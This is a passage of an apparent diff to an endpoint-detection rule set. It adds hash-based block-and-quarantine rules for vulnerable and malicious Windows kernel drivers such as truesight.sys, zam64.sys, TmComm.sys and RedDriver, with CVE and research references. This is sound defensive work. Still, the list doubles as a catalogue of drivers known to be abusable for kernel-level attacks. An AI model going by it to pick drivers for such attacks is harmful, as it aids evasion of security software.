+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978283Z",
+ "creation_date": "2026-03-23T11:45:29.978285Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978290Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b55b35284346bbcdc2754e60517e1702f0286770a080ee6ff3e7eed1cab812a",
+ "comment": "Vulnerable Kernel Driver (aka nt5.sys) [https://www.loldrivers.io/drivers/193df066-c27c-4343-a4eb-ad2ac417a4cc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4234a72b-d951-583b-a045-1d58879d60a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982200Z",
+ "creation_date": "2026-03-23T11:45:29.982202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982207Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa7f25d4857a4b443222934bcbb0904348a799fc884096f653d921817c0b34aa",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "423cbc49-7518-5b34-8dff-e3a5c7d2a54c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829255Z",
+ "creation_date": "2026-03-23T11:45:30.829257Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3171fc751a20680b3eb75b6a1a4767cbe4a8296c3b4f7d93781bfe176e5a6b75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "424203b8-e331-5d89-a3ad-fef08d05be5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981977Z",
+ "creation_date": "2026-03-23T11:45:29.981979Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981985Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e",
+ "comment": "Malicious Kernel Driver (aka wantd_6.sys) [https://www.loldrivers.io/drivers/127cde1d-905e-4c67-a2c3-04ea4deaea7d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4245fd3a-e2b1-576c-979d-a85babbe99ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818701Z",
+ "creation_date": "2026-03-23T11:45:30.818703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5fc66378fe68a380ccfab3521657b38912ca1fe5a8d7c857f591e928ab0b4208",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4249144b-9ad1-50e6-aa0f-e5203351323a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154639Z",
+ "creation_date": "2026-03-23T11:45:31.154641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f35a53c8e43f4738162ce8fed947c77e435295084ed517aeb0ab605f3c31078e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "425a2d2d-2798-5660-9769-bba4b58a2fcb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498282Z",
+ "creation_date": "2026-03-23T11:45:31.498286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498294Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "221a23982eb9f68ce42f415449c29aafbfdc5b185ec5db7907c3036fd9e6f5a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "425b5c62-7e16-5833-8e63-0dd9cb8c1a96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971336Z",
+ "creation_date": "2026-03-23T11:45:29.971339Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971347Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76614f2e372f33100a8d92bf372cdbc1e183930ca747eed0b0cf2501293b990a",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "425cde7b-40c5-548a-835a-e9764a4dc553",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974927Z",
+ "creation_date": "2026-03-23T11:45:29.974929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974934Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb21a13819bf295f34f5b34e3e566d25d880b045831e90ff610daf9e8b1f15cd",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "426791a9-29ef-59b9-9b1d-72523bf8f27c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985933Z",
+ "creation_date": "2026-03-23T11:45:29.985935Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985941Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f02aed3750bc6a924c75e774404f259f721d8f4081ed68aa01cf73ca5430f85",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "426ba44c-104d-5045-9687-7fc5ab06e359",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810576Z",
+ "creation_date": "2026-03-23T11:45:31.810578Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a65893522643740e9ba6032804eed874dc06a7a4102cf77d6a7817db77a5201",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42789297-8eb3-597e-9890-98bfe53563cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978615Z",
+ "creation_date": "2026-03-23T11:45:29.978617Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e",
+ "comment": "Vulnerable Kernel Driver (aka bwrsh.sys) [https://www.loldrivers.io/drivers/974de971-1f78-47b9-8049-6c34f294acd5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "428ec23c-78ac-5bf2-b728-193dd466f694",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834578Z",
+ "creation_date": "2026-03-23T11:45:30.834581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9a51d54ff081f05c3ec8edb2ec962bd65551b604c8ec958d0fd7ffbef9c6767",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "429b420e-2d25-56c7-970a-2e23c0b75434",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823590Z",
+ "creation_date": "2026-03-23T11:45:30.823592Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823598Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46e6d35814d232f0463bae3e1d62e1223712ff2332381ba57b81b17d28094991",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42c8f827-c7c8-5780-90ec-b0ef4a4894d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816265Z",
+ "creation_date": "2026-03-23T11:45:31.816269Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816276Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6747ddf15cb0b7e570b67b030d999e300ad20d09f469076309f402cc89e838b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42d3ff0b-4f0f-5c97-aaaf-e318986da366",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983561Z",
+ "creation_date": "2026-03-23T11:45:29.983562Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1",
+ "comment": "Vulnerable Kernel Driver (aka cpupress.sys) [https://www.loldrivers.io/drivers/c0645f0f-9b97-4fe9-811e-2e45c250c9ef/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42d66d37-8a8b-5e53-b993-6db4b13b5b8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495004Z",
+ "creation_date": "2026-03-23T11:45:31.495006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495012Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96d63d9e47520118cabac54ebd80b264e9f61425a2ddef2efb0433ef3ba4538e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42d6ebb2-3e20-5065-9705-08cdd285cca9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835267Z",
+ "creation_date": "2026-03-23T11:45:30.835270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95cbd3d9f485a1e5a9a24d819e21b89bcb576a937bd9b29e76bf2fd36d9abf3b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42db1acf-3baa-559d-92ac-843995acbd49",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820408Z",
+ "creation_date": "2026-03-23T11:45:30.820410Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820415Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c490d6c0844f59fdb4aa850a06e283fbf5e5b6ac20ff42ead03d549d8ae1c01b",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42e8fdf9-318f-53ee-bccf-8bf7eddcb29b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471926Z",
+ "creation_date": "2026-03-23T11:45:31.471929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471938Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1bb41517da813467dc2bc6ba3b0edfc572685b2829a4f53dedf9003ed7873585",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42ef1fb6-5792-5e4f-bf71-bef9e3487763",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832315Z",
+ "creation_date": "2026-03-23T11:45:30.832317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28026b2499bdaa4a19ed896e4bd77adb1a00b7f0575903dad25700025e588bfd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42fc1784-da1a-533d-9023-3091c9178eca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144890Z",
+ "creation_date": "2026-03-23T11:45:31.144892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "277c0ad0253ae2b95029b15a1de09347ad79504e1895cd7f3d8f4301941840ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43090516-aae3-540a-8c34-e2b12cb654cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823936Z",
+ "creation_date": "2026-03-23T11:45:30.823938Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
